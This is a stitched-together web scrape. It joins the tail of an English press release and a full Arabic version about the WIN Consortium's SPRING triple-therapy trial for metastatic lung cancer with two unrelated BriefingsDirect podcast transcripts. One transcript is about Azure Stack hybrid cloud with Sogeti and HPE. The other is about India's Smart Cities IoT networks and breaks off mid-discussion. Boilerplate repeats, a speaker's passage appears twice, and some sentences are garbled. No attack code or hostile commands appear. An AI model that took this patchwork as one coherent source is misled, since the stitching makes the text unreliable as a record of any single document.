‘’It is very exciting to see this endeavor becoming more concrete and this unprecedented cooperation materializing. We are looking forward to the activation of our clinical sites. We will need more combinations to be launched rapidly and other pharma companies to join us in this effort.’’, said Dr. Razelle Kurzrock, trial global coordinator, and Head of WIN Clinical Trials Committee. ‘’WIN has the potential and expertise to test other combinations and has the technologies needed to match patients’ tumor biology profile with the appropriate combination”.
About WIN Consortium
WIN Consortium is a French based non-profit network of 41 world-class academic medical centers, industries (pharmaceutical and diagnostic companies), health payer, research organizations and foundation and patient advocates spanning 17 countries and 4 continents, aligned to deliver now the progress in cancer treatment that is awaited by so many patients and families around the world.

For further information, please visit www.winconsortium.org

إدارة الغذاء والدواء الأمريكية تسمح لوين كونسورتيوم ببدء العمل بالتجربة السريرية للعلاج الثلاثي المستهدف كخط علاج أول لسرطان الرئة غير صغير الخلايا النقيلي

فيلجويف، فرنسا -(بزنيس واير/"ايتوس واير"): حصلت "وين كونسورتيوم" ("وين") على موافقة إدارة الغذاء والدواء الأمريكية ("إف دي إيه") للبدء بالدراسات السريرية بمنهجية علاجية حديثة باستخدام مجموعةً من ثلاثة علاجات مستهدفة لخط العلاج الأول للمرضى المصابين ببمراحل متقدّمة من سرطان الرئة ذو الخلايا غير الصغيرة ("إن إس سي إل سي"). وستهدف تجربة "إطالة أمد الحياة بالتقنيات الجينية المنطقية المبتكرة ("سبرينج") إلى تسجيل المرضى الذين يتلقون عادةً العلاج الكيماوي من الخط الأول القائم على البلاتين. وسيُستبعد المرضى الذين سجلوا تغيرات في الدافع القابل للاستهداف (طفرة مستقبل عامل النمو البشروي "إي جي إف آر"، وإعادة ترتيب مورثة الليمفوما الكشمية كيناز "إيه إل كيه"، وطفرة تخطي إنزيم "آر أو إس 1" و"إم إي تي إكسون 14"). ويمثل المرضى المصابون بسرطان الرئة غير صغير الخلايا دون طفرات قابلة للتدخل في الدافع السرطاني والذين يُتوقع تسجيلهم في تجربة "سبرينج"، الغالبية العظمى من المرضى المصابين بسرطان الرئة ذو الخلايا غير الصغيرة النقيلي (حوالي 80 في المائة من المرضى من العرق القوقازي).

ونظراً لاكتشاف حوالي 60 في المائة من سرطان الرئة غير صغير الخلايا في مرحلة متقدمة أو نقيلية، ووجود أقل من 5 في المائة من المرضى الذين ما زالوا على قيد الحياة بعد 5 أعوام، لا بدّ من اعتماد استراتيجية لتغيير النموذج لعلاج أنواع السرطان الأكثر فتكاً. وتستند منهجية "وين" الحديثة إلى استخدام مجموعة العلاجات الثلاثية من الأدوية المستهدفة، بعد النجاح التاريخي لهذه المنهجية في علاج مرضى الإيدز والسلّ. وعلى نحو مماثل، يعتمد مفهومنا على جمع الأدوية الثلاثة المستهدفة التي يُتوقّع أن تكون فعالة جداً عند استخدامها معاً، في حين أنها لن تؤدي سوى إلى نتيجة سريرية بسيطة إن استخدمت وحدها في علاج فردي.

وقال الدكتور جون مندلسون، رئيس مجلس إدارة "وين": "مع ذلك، إنه لمن الأهمية بمكان الاعتراف بوجود فرق كبير بين السرطان والإيدز حيث يكمن في التعقيد والتباين البيولوجي الكبير لمرض السرطان مقارنة بالإيدز. ففي علاج مرض الإيدز، يكون استخدام مجموعة واحدة ثلاثية العلاجات فعالاً لغالبية المرضى، في حين يُتوقع أن يحتاج علاج مرض السرطان إلى عدة مجموعات من العلاجات لمعالجة جميع المرضى بشكل فعال. وطوّرت ’وين كونسورتيوم‘ تقنيات جديدة لتخصيص مجموعات العلاجات لكل مريض على حدة. وبالتالي، تُعتبر تجربة ’وين‘، التي تحمل اسم ’سبرينج‘ دليلاً أولياً لمفهوم هذه المنهجية الحديثة في علاج سرطان الرئة، وستُختبر كأول مجموعة علاجات ثلاثية من قبل أعضاء ’وين‘ من الشركات الدوائية الرئيسية، والتي تتضمن ’أفيلوماب‘ من ’ميرك‘ مع ’بالبوسيكليب‘ و’أكسيتينيب‘ من ’فايزر‘".

وستقود البحث الأولي الذي أطلقه باحثو "سبرينج" الدكتورة رازيل كورزروك (جامعة كاليفورنيا سان دييغو، مركز مورز لأمراض السرطان) بمساعدة الدكتور إنريكيتا فيليب (معهد فال دي هيبرون للأورام السرطانية) ومن المخطط إطلاقه في 5 دول و8 مواقع خاصة بأعضاء شركة "وين"، حيث تتضمن جامعة كاليفورنيا سان دييغو، مركز مورز لأمراض السرطان؛ ومعهد أفيرا لأمراض السرطان (الدكتور بنجامين سولومون)، في الولايات المتحدة الأمريكية؛ ومعهد كوري (الدكتور نيكولاس جيرارد)؛ ومركز ليون بيرارد (الدكتور بيير ساينتيجني)؛ ومستشفى باريس سان جوزيف (الدكتور إريك رايموند)، في فرنسا؛ ومعهد فال دي هيبرون للأورام السرطانية، في إسبانيا؛ ومركز هوسبيتلير دو لوكسمبورغ (الدكتور جاي بيرشيم)؛ ومركز شايم شيبا الطبي (الدكتور جير بار)، في إسرائيل.

وستبدأ تجربة "سبرينج" بجزء المرحلة الأولى لاستكشاف سلامة مجموعة العالجات وتحديد الجرعات المثلى للمرحلة الثانية التي ستستكشف فعالية نظام العلاج الثلاثي هذا في خط العلاج الأول لسرطان الرئة غير صغير الخلايا النقيلي. وستهدف التجربة أيضاً إلى التحقق من صحة خوارزميات "إس آي إم إس" الحديثة (نظام مبسّط لرسم خرائط التدخلات) الذي طوّرته وصمّمته "وين" للقيام بعملية المطابقة الحيوية بين الأورام لدى كل مريض مع مجموعة معين من العلاجات. ولتحقيق هذه الغاية، ستؤخذ خزعات من الأنسجة المصابة بأورام والأنسجة الطبيعية وسيجري استكشافها في تجربة "سبرينج". وسيتم إجراء تحليلات الحمض النووي الريبي منقوص الأوكسجين "دي إن إيه" والحمض النووي الريبي "آر إن إيه" من قبل الدكتور براندون يونغ، في مختبرات أفيرا بريسيشن لأمراض السرطان التابعة لـ "وين" في سان ماركوس بكاليفورنيا، على خرعٍ باستخدام التقنيات التالية على التوالي: تقنية "إلومينا إن جي إس" (الجيل التالي من تقنيات التسلسل الجيني) وتعبيرات تقنية "إيدج سيك" من "إتش تي جي موليكيولار" (الحمض النووي الريبي المرسال "إم آر إن إيه" والحمض النووي الريبي المصغر "ميكرو آر إن إيه") المستخدمة بالتزامن مع تقنية "إلومينا إن جي إس". وستجري عملية تكامل البيانات لخوارزمية نظام "إس آي إم إس" في جامعة بن جوريون في النقب بإسرائيل (من قبل الدكتور إيتان روبن).

وقال الدكتور فلاديمير لازار، الرئيس التنفيذي للشؤون العلمية والتشغيلية في "وين": "نشهد تعاوناً غير مسبوق بين أعضاء ’وين‘ من المنظمات الأكاديمية والصناعية والمعنية بالأبحاث. وستقوم ثمانية مواقع سريرية بتفعيل الدراسة، وستتوفر الأدوية من ’فايزر‘ وستجري ’إلومينا‘و’إتش تي جي موليكيولار‘ تقنيات تحليل الحمض النووي الريبي منقوص الأوكسجين "دي إن إيه" والحمض النووي الريبي "آر إن إيه"، بينما توفّر’كوفانس‘ القياسات الحيوية والسلامة الدوائية. ونتوجّه بالشكر بشكل خاص إلى ’فاوندايشن إيه آر سي‘ للبحث السرطاني في فرنسا على الدعم المالي للبدء بتجربة ’سبرينج‘. ونرحّب بدعم أي منظمة أخرى أو أي متبرعٍ خاص يرغب بالانضمام لهذا الجهد العالمي الفريد من نوعه والمخصص لمرضى سرطان الرئة".

وقالت الدكتورة رازيل كورزروك، المنسقة العالمية للتجارب، ورئيسة لجنة التجارب السريرية في "وين": "من المشوق جداً رؤية تحوّل هذه الجهود إلى أمرٍ ملموس إضافةً إلى تجسّد هذا التعاون غير المسبوق. ونتطلع إلى تفعيل مواقعنا السريرية، كما سنحتاج إلى إطلاق المزيد من مجموعات العلاجات بسرعة وإلى انضمام شركات أدويةٍ أُخرى إلينا في إنجاز هذا العمل. وتملك "وين" القدرة والخبرة لاختبار مجموعات علاجاتٍ أخرى ولديها التقنيات المطلوبة بعملية المطابقة الحيوية بين الأورام لدى كل مريض مع مجموعة علاجاتٍ مناسبةٍ من الأدوية".

لمحة عن "وين كونسورتيوم"
تُعتبر "وين كونسورتيوم" شبكةً غير ربحيّة تتّخذ من فرنسا مقرّاً لها وتضمّ 41 عضواً عالمي المستوى من مراكز أكاديمية طبية، وقطاعات (شركات دوائية وتشخيصية)، وجهات ممولة لنفقات الرعاية الصحّية، ومنظمات الأبحاث، والمؤسسات، والمدافعين عن حقوق المرضى في 17 دولةً وأربع قارّات، حيث تعمل بشكل متناسق لتوفر في الوقت الحاضر التطورات في مجال علاج مرض السرطان التي ينتظرها الكثير من المرضى والعائلات في جميع أنحاء العالم.
The next BriefingsDirect Voice of the Customer hybrid cloud advancements discussion explores the application development and platform-as-a-service (PaaS) benefits from Microsoft Azure Stack

We’ll now learn how ecosystems of solutions partners are teaming to provide specific vertical industries with applications and services that target private cloud deployments.

Listen to the podcast. Find it on iTunes. Get the mobile app. Read a full transcript or download a copy.

Here to help us explore the latest in successful cloud-based applications development and deployment is our panel, Martin van den Berg, Vice President and Cloud Evangelist at Sogeti USA, based in Cleveland, and Ken Won, Director of Cloud Solutions Marketing at Hewlett Packard Enterprise (HPE). The discussion is moderated by Dana Gardner, Principal Analyst at Interarbor Solutions.

Here are some excerpts:

Gardner: Martin, what are some of the trends that are driving the adoption of hybrid cloud applications specifically around the Azure Stack platform?

Van den Berg: What our clients are dealing with on a daily basis is an ever-expanding data center, they see ever-expanding private clouds in their data centers. They are trying to get into the hybrid cloud space to reap all the benefits from both an agility and compute perspective.

van den Berg

They are trying to get out of the data center space, to see how the ever-growing demand can leverage the cloud. What we see is that Azure Stack will bridge the gap between the cloud that they have on-premises, and the public cloud that they want to leverage -- and basically integrate the two in a true hybrid cloud scenario.

Gardner: What sorts of applications are your clients calling for in these clouds? Are these cloud-native apps, greenfield apps? What are they hoping to do first and foremost when they have that hybrid cloud capability?

Van den Berg: We see a couple of different streams there. One is the native-cloud development. More and more of our clients are going into cloud-native development. We recently brought out a white paper wherein we see that 30 percent of applications being built today are cloud-native already. We expect that trend to grow to more than 60 percent over the next three years for new applications.

HPE Partnership Case Studies
of Flex Capacity Financing

The issue that some of our clients have has to do with some of the data being consumed in these applications. Either due to compliance issues, or that their information security divisions are not too happy, they don’t want to put this data in the public cloud. Azure Stack bridges that gap as well.
 
They can leverage the whole Azure public cloud PaaS while still having their data on-premises in their own data center. That's a unique capability.
Microsoft Azure Stack can bridge the gap between the on-premises data center and what they do in the cloud. They can leverage the whole Azure public cloud PaaS while still having their data on-premises in their own data center. That's a unique capability.

On the other hand, what we also see is that some of our clients are looking at Azure Stack as a bridge to gap the infrastructure-as-a-service (IaaS) space. Even in that space, where clients are not willing to expand their own data center footprint, they can use Azure Stack as a means to seamlessly go to the Azure public IaaS cloud.

Gardner: Ken, does this jibe with what you are seeing at HPE, that people are starting to creatively leverage hybrid models? For example, are they putting apps in one type of cloud and data in another, and then also using their data center and expanding capacity via public cloud means?

Won

Won: We see a lot of it. The customers are interested in using both private clouds and public clouds. In fact, many of the customers we talk to use multiple private clouds and multiple public clouds. They want to figure out how they can use these together -- rather than as separate, siloed environments. The great thing about Azure Stack is the compatibility between what’s available through Microsoft Azure public cloud and what can be run in their own data centers.

The customer concerns are data privacy, data sovereignty, and security. In some cases, there are concerns about application performance. In all these cases, it's a great situation to be able to run part or all of the application on-premises, or on an Azure Stack environment, and have some sort of direct connectivity to a public cloud like Microsoft Azure.

Because you can get full API compatibility, the applications that are developed in the Azure public cloud can be deployed in a private cloud -- with no change to the application at all.

Gardner: Martin, are there specific vertical industries gearing up for this more than others? What are the low-lying fruit in terms of types of apps?

Hybrid healthcare files

Van den Berg: I would say that hybrid cloud is of interest across the board, but I can name a couple of examples of industries where we truly see a business case for Azure Stack.

One of them is a client of ours in the healthcare industry. They wanted to standardize on the Microsoft Azure platform. One of the things that they were trying to do is deal with very large files, such as magnetic resonance imaging (MRI) files. What they found is that in their environment such large files just do not work from a latency and bandwidth perspective in a cloud.

With Microsoft Azure Stack, they can keep these larger files on-premises, very close to where they do their job, and they can still leverage the entire platform and still do analytics from a cloud perspective, because that doesn’t require the bandwidth to interact with things right away. So this is a perfect example where Azure Stack bridges the gap between on-premises and cloud requirements while leveraging the entire platform.

Gardner: What are some of the challenges that these organizations are having as they move to this model? I assume that it's a little easier said than done. What's holding people back when it comes to taking full advantage of hybrid models such as Azure Stack?

Van den Berg: The level of cloud adoption is not really yet where it should be. A lot of our clients have cloud strategies that they are implementing, but they don't have a lot of expertise yet on using the power that the platform brings.

Some of the basic challenges that we need to solve with clients are that they are still dealing with just going to Microsoft Azure cloud and the public cloud services. Azure Stack simplifies that because they now have the cloud on-premises. With that, it’s going to be easier for them to spin-up workload environments and try this all in a secure environment within their own walls, their own data centers.

Should a specific workload go in a private cloud, or should another workload go in a public cloud?
Won: We see a similar thing with our client base as customers look to adopt hybrid IT environments, a mix of private and public clouds. Some of the challenges they have include how to determine which workload should go where. Should a specific workload go in a private cloud, or should another workload go in a public cloud?

We also see some challenges around processes, organizational process and business process. How do you facilitate and manage an environment that has both private and public clouds? How do you put the business processes in place to ensure that they are being used in the proper way? With Azure Stack -- because of that full compatibility with Azure -- it simplifies the ability to move applications across different environments.

Gardner: Now that we know there are challenges, and that we are not seeing the expected adoption rate, how are organizations like Sogeti working in collaboration with HPE to give a boost to hybrid cloud adoption?

Strategic, secure, scalable cloud migration 

Van den Berg: As the Cloud Evangelist with Sogeti, for the past couple of years I have been telling my clients that they don’t need a data center. The truth is, they probably need some form of on-premises still. But the future is in the clouds, from a scalability and agility perspective -- and the hyperscale with which Microsoft is building out their Azure cloud capabilities, there are no enterprise clients that can keep up with that. 

We try to help our clients define strategy, help them with governance -- how do they approach cloud and what workloads can they put where based on their internal regulations and compliance requirements, and then do migration projects.
The future is in the clouds, from a scalability and agility perspective.

We have a service offering called the Sogeti Cloud Assessment, where we go in and evaluate their application portfolio on their cloud readiness. At the end of this engagement, we start moving things right away. We have been really successful with many of our clients in starting to move workloads to the cloud.

Having Azure Stack will make that even easier. Now when a cloud assessment turns up some issues on moving the Microsoft Azure public cloud -- because of compliance or privacy issues or just comfort (sometimes the information security departments just don't feel comfortable moving certain types of data to a public cloud setting) -- we can move those applications to the cloud, leverage the full power and scalability of the cloud while keeping it within the walls of our clients’ data centers. That’s how we are trying to accelerate the cloud adoption, and we truly feel that Azure Stack bridges that gap.

HPE Partnership Case Studies
of Flex Capacity Financing

Gardner: Ken, same question, how are you and Sogeti working together to help foster more hybrid cloud adoption?

Won: The cloud market has been maturing and growing. In the past, it’s been somewhat complicated to implement private clouds. Sometimes these private clouds have been incompatible with each other, and with the public clouds.

In the Azure Stack area, now we have almost an appliance-like experience where we have systems that we build in our factories that we pre-configure, pretest, and get them into the customers’ environment so that they can quickly get their private cloud up and running. We can help them with the implementation, set it up so that Sogeti can help with the cloud-native applications work.
 
With Sogeti and HPE working together, we make it much simpler for companies to adopt the hybrid cloud models and to quickly see the benefit of moving into a hybrid environment.
Sogeti and HPE work together to make it much simpler for companies to adopt the hybrid cloud models.

Van den Berg: In talking to many of our clients, when we see the adoption of private cloud in their organizations -- if they are really honest -- it doesn't go very far past just virtualization. They truly haven't leveraged what cloud could bring, not even in a private cloud setting.

So talking about hybrid cloud, it is very hard for them to leverage the power of hybrid clouds when their own private cloud is just virtualization. Azure Stack can help them to have a true private cloud within the walls of their own data centers and so then also leverage everything that Microsoft Azure public cloud has to offer.

Won: I agree. When they talk about a private cloud, they are really talking about virtual  machines, or virtualization. But because the Microsoft Azure Stack solution provides built-in services that are fully compatible with what's available through Microsoft Azure public cloud, it truly provides the full cloud experience. These are the types of services that are beyond just virtualization running within the customers’ data center.

Keep IT simple

I think Azure Stack adoption will be a huge boost to organizations looking to implement private clouds in their data centers.

Gardner: Of course your typical end-user worker is interested primarily their apps, they don’t really care where they are running. But when it comes to getting new application development, rapid application development (RAD), these are some of the pressing issues that most businesses tell us concern them.

So how does RAD, along with some DevOps benefits, play into this, Martin? How are the development people going to help usher in cloud and hybrid cloud models because it helps them satisfy the needs of the end-users in terms of rapid application updates and development?

Van den Berg: This is also where we are talking about the difference between virtualization, private cloud, hybrid clouds, and definitely cloud services. So for the application development staff, they still run in the traditional model, they still run into issues in provisioning of their development environments and sometimes test environments.

A lot of cloud-native application development projects are much easier because you can spin-up environments on the go. What Azure Stack is going to help with is having that environment within the client’s data center; it’s going to help the developers to spin up their own resources.

There is going to be on-demand orchestration and provisioning, which is truly beneficial to application development -- and it's really beneficial to the whole DevOps suite.

There is going to be on-demand orchestration and provisioning, which is truly beneficial to application development -- and it's really beneficial to the whole DevOps suite
We need to integrate business development and IT operations to deliver value to our clients. If we are waiting multiple weeks for development and the best environment to spin up -- that’s an issue our clients are still dealing with today. That’s where Azure Stack is going to bridge the gap, too.

Won: There are a couple of things that we see happening that will make developers much more productive and able to bring new applications or updates quicker than ever before. One is the ability to get access to these services very, very quickly. Instead of going to the IT department and asking them to spin up services, they will be able to access these services on their own.

The other big thing that Azure Stack offers is compatibility between private and public cloud environments. For the first time, the developer doesn't have to worry about what the underlying environment is going to be. They don’t have to worry about deciding, is this application going to run in a private cloud or a public cloud, and based on where it’s going, do they have to use a certain set of tools for that particular environment.

Now that we have compatibility between the private cloud and the public cloud, the developer can just focus on writing code, focus on the functionality of the application they are developing, knowing that that application now can easily be deployed into a private cloud or a public cloud depending on the business situation, the security requirements, and compliance requirements.

So it’s really about helping the developers become more effective and helping them focus more on code development and applications rather than having them worry about the infrastructure, or waiting for infrastructure to come from the IT department.

HPE Partnership Case Studies
of Flex Capacity Financing

Gardner: Martin, for those organizations interested in this and want to get on a fast track, how does an organization like Sogeti working in collaboration with HPE help them accelerate adoption?

Van den Berg: This is where we heavily partner with HPE, to bring the best solutions to our clients. We have all kinds of proof of concepts, we have accelerators, and one of the things that we talked about already is making developers get up to speed faster. We can truly leverage those accelerators and help our clients adopt cloud, and adopt all the services that are available on the hybrid platform.

We have all heard the stories about standardizing on micro-services, on a server fabric, or serverless computing, but developers have not had access to this up until now and IT departments have been slow to push this to the developers.

The accelerators that we have, the approaches that we have, and the proofs of concept that we can do with our client -- together with HPE --  are going to accelerate cloud adoption with our clientele. 

Gardner: Any specific examples, some specific vertical industry use-cases where this really demonstrates the power of the true hybrid model?

When the ship comes in

Won: I can share a couple of examples of the types of companies that we are working with in the hybrid area, and what places that we see typical customers using Azure Stack.

People want to implement disconnected applications or edge applications. These are situations where you may have a data center or an environment running an application that you may either want to run in a disconnected fashion or run to do some local processing, and then move that data to the central data center.

One example of this is the cruise ship industry. All large cruise ships have essentially data centers running the ship, supporting the thousands of customers that are on the ship. What the cruise line vendors want to do is put an application on their many ships and to run the same application in all of their ships. They want to be able to disconnect from connectivity of the central data center while the ship is out at sea and to do a lot of processing and analytics in the data center, in the ship. Then when the ship comes in and connects to port and to the central data center, it only sends the results of the analysis back to the central data center.

This is a great example of having an application that can be developed once and deployed in many different environments, you can do that with Azure Stack. It’s ideal, running that same application in multiple different environments, in either disconnected or connected situations.

Van den Berg: In the financial services industry, we know they are heavily regulated. We need to make sure that they are always in compliance.

So one of the things that we did in the financial services industry with one of our accelerators, we actually have a tool called Sogeti OneShare. It’s a portal solution on top of Microsoft Azure that can help you with orchestration, which can help you with the whole DevOps concept. We were able to have the edge node be Azure Stack -- building applications, have some of the data reside within the data center on the Azure Stack appliance, but still leverage the power of the clouds and all the analytics performance that was available there.

That's what DevOps is supposed to deliver -- faster value to the business, leveraging the power of clouds.
Van den Berg: In talking to many of our clients, when we see the adoption of private cloud in their organizations -- if they are really honest -- it doesn't go very far past just virtualization. They truly haven't leveraged what cloud could bring, not even in a private cloud setting.

So talking about hybrid cloud, it is very hard for them to leverage the power of hybrid clouds when their own private cloud is just virtualization. Azure Stack can help them to have a true private cloud within the walls of their own data centers and so then also leverage everything that Microsoft Azure public cloud has to offer. We just did a project in this space and we were able to deliver functionality to the business from start of the project in just eight weeks. They have never seen that before -- the project that just lasts eight weeks and truly delivers business value. That's the direction that we should be taking. That’s what DevOps is supposed to deliver -- faster value to the business, leveraging the power of clouds.

Gardner: Perhaps we could now help organizations understand how to prepare from a people, process, and technology perspective to be able to best leverage hybrid cloud models like Microsoft Azure Stack.

Martin, what do you suggest organizations do now in order to be in the best position to make this successful when they adopt?

Be prepared

Van den Berg: Make sure that the cloud strategy and governance are in place. That's one of the first things this should always start with.

Then, start training developers, and make sure that the IT department is the broker of cloud services. In the traditional sense, it is always normal that the IT department is the broker for everything that is happening on-premises within the data center. In the cloud space, this doesn’t always happen. In the cloud space, because it is so easy to spin-up things, sometimes the line of business is deploying.

We try to enable IT departments and operators within our clients to be the broker of cloud services and to help with the adoption of Microsoft Azure cloud and Azure Stack. That will help bridge the gap between the clouds and the on-premises data centers.

Gardner: Ken, how should organizations get ready to be in the best position to take advantage of this successfully?

Mapping the way

Won: As IT organizations look at this transformation to hybrid IT, one of the most important things is to have a strong connection to the line of business and to the business goals, and to be able to map those goals to strategic IT priorities.

Once you have done this mapping, the IT department can look at these goals and determine which projects should be implemented and how they should be implemented. In some cases, they should be implemented in private clouds, in some cases public clouds, and in some cases across both private and public cloud.

The task then changes to understanding the workloads, the characterization of the workloads, and looking at things such as performance, security, compliance, risk, and determining the best place for that workload.

Then, it’s finding the right platform to enable developers to be as successful and as impactful as possible, because we know ultimately the big game changer here is enabling the developers to be much more productive, to bring applications out much faster than we have ever seen in the past.

Listen to the podcast. Find it on iTunes. Get the mobile app. Read a full transcript or download a copy. Sponsor: Hewlett Packard Enterprise.


You may also be interested in:

          India Smart Cities Mission shows IoT potential for improving quality of life at vast scale        
The next BriefingsDirect Voice of the Customer Internet-of-Things (IoT) transformation discussion examines the potential impact and improvement of low-power edge computing benefits on rapidly modernizing cities.

These so-called smart city initiatives are exploiting open, wide area networking (WAN) technologies to make urban life richer in services, safer, and far more responsive to residences’ needs. We will now learn how such pervasively connected and data-driven IoT architectures are helping cities in India vastly improve the quality of life there.

Listen to the podcast. Find it on iTunes. Get the mobile app. Read a full transcript or download a copy.

Here to share how communication service providers have become agents of digital urban transformation are VS Shridhar, Senior Vice President and Head of the Internet-of-Things Business Unit at Tata Communications in Chennai area, India, and Nigel Upton, General Manager of the Universal IoT Platform and Global Connectivity Platform and Communications Solutions Business at Hewlett Packard Enterprise (HPE). The discussion is moderated by Dana Gardner, principal analyst at Interarbor Solutions.

Here are some excerpts:

Gardner: Tell us about India’s Smart Cities mission. What are you up to and how are these new technologies coming to bear on improving urban quality of life?

Shridhar: The government is clearly focusing on Smart Cities as part of their urbanization plan, as they believe Smart Cities will not only improve the quality of living, but also generate employment, and take the whole country forward in terms of technologically embracing and improving the quality of life.

So with that in mind, the Government of India has launched 100 Smart Cities initiatives. It’s quite interesting because each of the cities that aspire to belong had to make a plan and their own strategy around how they are going to evolve and how they are going to execute it, present it, and get selected. There was a proper selection process.

Many of the cities made it, and of course some of them didn’t make it. Interestingly, some of the cities that didn’t make it are developing their own plans.
IoT Solutions for Communications Service Providers and Enterprises from HPE
Learn More
There is lot of excitement and curiosity as well as action in the Smart Cities project. Admittedly, it’s a slow process, it’s not something that you can do at the blink of the eye, and Rome wasn’t built overnight, but I definitely see a lot of progress.

Gardner:Nigel, it seems that the timing for this is auspicious, given that there are some foundational technologies that are now available at very low cost compared to the past, and that have much more of a pervasive opportunity to gather information and make a two-way street, if you will, between the edge and central administration. How is the technology evolution synching up with these Smart Cities initiatives in India?

Upton:I am not sure whether it’s timing or luck, or whatever it happens to be, but adoption of the digitization of city infrastructure and services is to some extent driven by economics. While I like to tease my colleagues in India about their sensitivity to price, the truth of the matter is that the economics of digitization -- and therefore IoT in smart cities -- needs to be at the right price, depending on where it is in the world, and India has some very specific price points to hit. That will drive the rate of adoption.

And so, we're very encouraged that innovation is continuing to drive price points down to the point that mass adoption can then be taken up, and the benefits realized to a much more broad spectrum of the population. Working with Tata Communications has really helped HPE understand this and continue to evolve as technology and be part of the partner ecosystem because it does take a village to raise an IoT smart city. You need a lot of partners to make this happen, and that combination of partnership, willingness to work together and driving the economic price points to the point of adoption has been absolutely critical in getting us to where we are today.

Balanced Bandwidth

Gardner:Shridhar, we have some very important optimization opportunities around things like street lighting, waste removal, public safety, water quality; of course, the pervasive need for traffic and parking, monitoring and improvement.

How do things like a low-power specification Internet and network gateways and low-power WANs (LPWANs) create a new foundation technically to improve these services? How do we connect the services and the technology for an improved outcome?

Shridhar:If you look at human interaction to the Internet, we have a lot of technology coming our way. We used to have 2G, that has moved to 3G and to 4G, and that is a lot of bandwidth coming our way. We would like to have a tremendous amount of access and bandwidth speeds and so on, right?

Shridhar
So the human interaction and experience is improving vastly, given the networks that are growing. On the machine-to-machine (M2M) side, it’s going to be different. They don’t need oodles of bandwidth. About 80 to 90 percent of all machine interactions are going to be very, very low bandwidth – and, of course, low power. I will come to the low power in a moment, but it’s going to be very low bandwidth requirement.

In order to switch off a streetlight, how much bandwidth do you actually require? Or, in order to sense temperature or air quality or water and water quality, how much bandwidth do you actually require?

When you ask these questions, you get an answer that the machines don’t require that much bandwidth. More importantly, when there are millions -- or possibly billions -- of devices to be deployed in the years to come, how are you going to service a piece of equipment that is telling a streetlight to switch on and switch off if the battery runs out?

Machines are different from humans in terms of interactions. When we deploy machines that require low bandwidth and low power consumption, a battery can enable such a machine to communicate for years.

Aside from heavy video streaming applications or constant security monitoring, where low-bandwidth, low-power technology doesn’t work, the majority of the cases are all about low bandwidth and low power. And these machines can communicate with the quality of service that is required.

When it communicates, the network has to be available. You then need to establish a network that is highly available, which consumes very little power and provides the right amount of bandwidth. So studies show that less than 50 kbps connectivity should suffice for the majority of these requirements.

Now the machine interaction also means that you collect all of them into a platform and basically act on them. It's not about just sensing it, it's measuring it, analyzing it, and acting on it.

Low-power to the people

So the whole stack consists not just of connectivity alone. It’s LPWAN technology that is emerging now and is becoming a de facto standard as more-and-more countries start embracing it.

At Tata Communications we have embraced the LPWAN technology from the LoRa Alliance, a consortium of more than 400 partners who have gotten together and are driving standards. We are creating this network over the next 18 to 24 months across India. We have made these networks available right now in four cities. By the end of the year, it will be many more cities -- almost 60 cities across India by March 2018.

Gardner: Nigel, how do you see the opportunity, the market, for a standard architecture around this sort of low-power, low-bandwidth network? This is a proof of concept in India, but what's the potential here for taking this even further? Is this something that has global potential?
IoT Solutions for Communications Service Providers and Enterprises from HPE
Learn More
Upton: The global potential is undoubtedly there, and there is an additional element that we didn't talk about which is that not all devices require the same amount of bandwidth. So we have talked about video surveillance requiring higher bandwidth, we have talked about devices that have low-power bandwidth and will essentially be created once and forgotten when expected to last 5 or 10 years.

Upton
We also need to add in the aspect of security, and that really gave HPE and Tata the common ground of understanding that the world is made up of a variety of network requirements, some of which will be met by LPWAN, some of which will require more bandwidth, maybe as high as 5G.

The real advantage of being able to use a common architecture to be able to take the data from these devices is the idea of having things like a common management, common security, and a common data model so that you really have the power of being able to take information, take data from all of these different types of devices and pull it into a common platform that is based on a standard.

In our case, we selected the oneM2M standard, it’s the best standard available to be able to build that common data model and that's the reason why we deployed the oneM2M model within the universal IoT platform to get that consistency no matter what type of device over no matter what type of network.

Gardner: It certainly sounds like this is an unprecedented opportunity to gather insight and analysis into areas that you just really couldn't have measured before. So going back to the economics of this, Shridhar, have you had any opportunity through these pilot projects in such cities as Jamshedpur to demonstrate a return on investment, perhaps on street lighting, perhaps on quality of utilization and efficiency? Is there a strong financial incentive to do this once the initial hurdle of upfront costs is met?

Data-driven cost reduction lights up India

Unless the customer sees that there is a scope for either reducing the cost or increasing the customer experience, they are not going to buy these kinds of solutions.
Shridhar: Unless the customer sees that there is a scope for either reducing the cost or increasing the customer experience, they are not going to buy these kinds of solutions. So if you look at how things have been progressing, I will give you a few examples of how the costs have started constructing and playing out. One of course is to have devices, meeting at certain price point, we talked about how in India -- we talked that Nigel was remarking how constant still this Indian market is, but it’s important, once we delivered to a certain cost, we believe we can now deliver globally to scale. That’s very important, so if we build something in India it would deliver to the global market as well.

The streetlight example, let’s take that specifically and see what kind of benefits it would give. When a streetlight operates for about 12 hours a day, it costs about Rs.12, which is about $0.15, but when you start optimizing it and say, okay, this is a streetlight that is supported currently on halogen and you move it to LED, it brings a little bit of cost saving, in some cases significant as well. India is going through an LED revolution as you may have read in the newspapers, those streetlights are being converted, and that’s one distinct cost advantage.

Now they are looking and driving, let’s say, the usage and the electricity bills even lower by optimizing it. Let’s say you sync it with the astronomical clock, that 6:30 in the evening it comes up and let’s say 6:30 in the morning it shuts down linking to the astronomical clock because now you are connecting this controller to the Internet.

The second thing that you would do is during busy hours keep it at the brightest, let’s say between 7:00 and 10:00, you keep it at the brightest and after that you start minimizing it. You can control it down in 10 percent increments.

The point I am making is, you basically deliver intensity of light to the kind of requirement that you have. If it is busy, or if there is nobody on the street, or if there is a safety requirement -- a sensor will trigger up a series of lights, and so on.

So your ability to play around with just having streetlight being delivered to the requirement is so high that it brings down total cost. While I was telling you about $0.15 that you would spend per streetlight, that could be brought down to $0.05. So that’s the kind of advantage by better controlling the streetlights. The business case builds up, and a customer can save 60 to 70 percent just by doing this. Obviously, then the business case stands out.

The question that you are asking is an interesting one because each of the applications has its own way of returning the investment back, while the optimization of resources is being done. There is also a collateral positive benefit by saving the environment. So not only do I gain a business savings and business optimization, but I also pass on a general, bigger message of a green environment. Environment and safety are the two biggest benefits of implementing this and it would really appeal to our customers.

Gardner:It’s always great to put hard economic metrics on these things, but Shridhar just mentioned safety. Even when you can't measure in direct economics, it's invaluable when you can bring a higher degree of safety to an urban environment.

It opens up for more foot traffic, which can lead to greater economic development, which can then provide more tax revenue. It seems to me that there is a multiplier effect when you have this sort of intelligent urban landscape that creates a cascading set of benefits: the more data, the more efficiency; the more efficiency, the more economic development; the more revenue, the more data and so on. So tell us a little bit about this ongoing multiplier and virtuous adoption benefit when you go to intelligent urban environments?

Quality of life, under control

